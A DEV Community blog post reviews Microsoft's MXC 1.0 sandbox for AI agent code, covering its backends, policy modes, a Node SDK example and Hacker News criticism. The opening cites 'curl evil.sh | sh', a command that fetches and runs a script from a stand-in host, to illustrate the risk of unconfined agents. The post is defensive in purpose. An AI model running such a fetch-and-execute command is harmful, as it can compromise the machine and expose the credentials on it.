DEV Community

Ashraf
Ashraf

Posted on

Microsoft Just Shipped an AI Agent Sandbox (MXC). Here's What's Real and What's 1.0 in Name Only

Your coding agent has a shell, your home directory, your ~/.aws folder, and an open network connection. The only thing between it and curl evil.sh | sh is a system prompt that says "please don't."

That's the state of AI agent security in most setups. On October 7, Microsoft shipped something to change it: MXC (Microsoft Execution Containers) 1.0. It hit the Hacker News front page with 187+ points and a very split comment section.

Here's what it actually is, how to use it, and where the skepticism is deserved.

What MXC is

MXC is a policy-driven sandbox for running untrusted or model-generated code. You describe what the process may touch. MXC enforces it from outside the agent.

Microsoft's line, and it's the right one:

"An agent cannot be its own security authority. It must run within a boundary defined by the developer or organization and enforced independently of the agent itself."

Prompt-level guardrails are suggestions. A boundary enforced by the OS is not.

Four backends, one policy

The useful design choice: one JSON config schema and SDK, multiple isolation levels underneath.

Backend Platforms What it's for
Process container Windows 11, macOS, Linux Fast, lightweight. Uses AppContainer / Seatbelt / Bubblewrap under the hood
Session container Windows 11 Long-running agents. Separate Windows account, session, clipboard and UI
WSL container (WSLc) Windows 11 Linux-first toolchains
MicroVM Windows 11, Linux (experimental) High-risk workloads, hardware-backed isolation

Policies cover five areas: containment choice, process (command, args, cwd, env), filesystem, network, and UI access.

There are also three modes, and this is the part I like:

  • Enforcement: ungranted access is blocked. Production.
  • Learning: blocked and recorded to a JSON activity report. Use it to figure out what your agent actually needs.
  • Permissive: allowed but recorded. Use it to observe before you lock down.

That's the correct workflow. Nobody writes a perfect allowlist up front. You watch, then you tighten.

Using it

SDKs exist for Node (@microsoft/mxc-sdk), Rust (mxc-sdk) and .NET (Microsoft.Mxc.Sdk). From the repo README:

import { spawn, type ContainerRequest } from '@microsoft/mxc-sdk/v1';

const request: ContainerRequest = {
  command: 'node -e "console.log(\'hello from container\')"',
  network: { egress: { default: 'deny' } },
  timeoutMs: 30_000,
};

const child = await spawn(request);
Enter fullscreen mode Exit fullscreen mode

Default-deny egress, hard timeout, done. That's the shape you want wrapped around any tool call where a model decides the command.

(Heads up: some third-party tutorials show a different policy schema with fields like readonlyPaths and maxPid. I couldn't match that to the README, so treat those as unverified and check the repo's schema docs.)

Who's already on board

Per Microsoft's announcement: GitHub Copilot, OpenAI Codex, NVIDIA (OpenShell integration), Replit, LM Studio and Unsloth are already supported. Anthropic's Claude Code, Box, Egnyte, Perplexity and Raycast are listed as coming. The repo is MIT-licensed with about 2.6k stars.

When the vendors building the agents all converge on the same containment layer, that's a signal. Sandboxing is becoming table stakes, not a differentiator.

The HN pushback (some of it is fair)

The comments weren't kind, and a few points land:

  1. "This is a preview wearing a 1.0 badge." Several people called the docs thin and the project sloppy. Third-party coverage describes the SDK as "stable enough for development and non-security-critical production use." That is not a sentence you want to read about a security boundary.
  2. "Linux already does this." Bubblewrap, Firecracker, SELinux, gVisor: if you're on Linux, you can build this today. True, and MXC's Linux process backend literally uses Bubblewrap. The value is the unified policy and cross-platform story, not new kernel magic.
  3. "More layers aren't a security model." The top comment argues that piling on complexity isn't working. Fair. A sandbox with a wide-open policy is theater.
  4. Suspected LLM-written code. One commenter guessed parts were generated by a model told to "make it work at all costs." Others pushed back. I'd say: irrelevant to the argument, and extremely relevant to your threat model. Read the code before you trust it.

The genuinely positive point: on Windows 11, setting up app containers without admin rights is real progress, and Windows has been the weakest platform for this.

My take

Should you adopt it? Depends on where you are.

  • Windows or cross-platform tooling, building agents that run on user machines: yes, evaluate now. Nothing else gives you one policy across three OSes.
  • Linux server-side agents: you already have good options. Use Bubblewrap or Firecracker directly unless you need the portability.
  • Anything holding real secrets: use the MicroVM backend once it's out of experimental, or don't run untrusted code there at all.

And whichever you pick, run in Learning mode first, deny egress by default, and never mount credentials into the sandbox.

The bigger point isn't MXC. It's that "the agent has full access, trust the prompt" is finished as an acceptable default. MXC may be v1 in name only, but the direction is right.

Links: microsoft/mxc on GitHub · Microsoft's announcement · HN discussion

Top comments (0)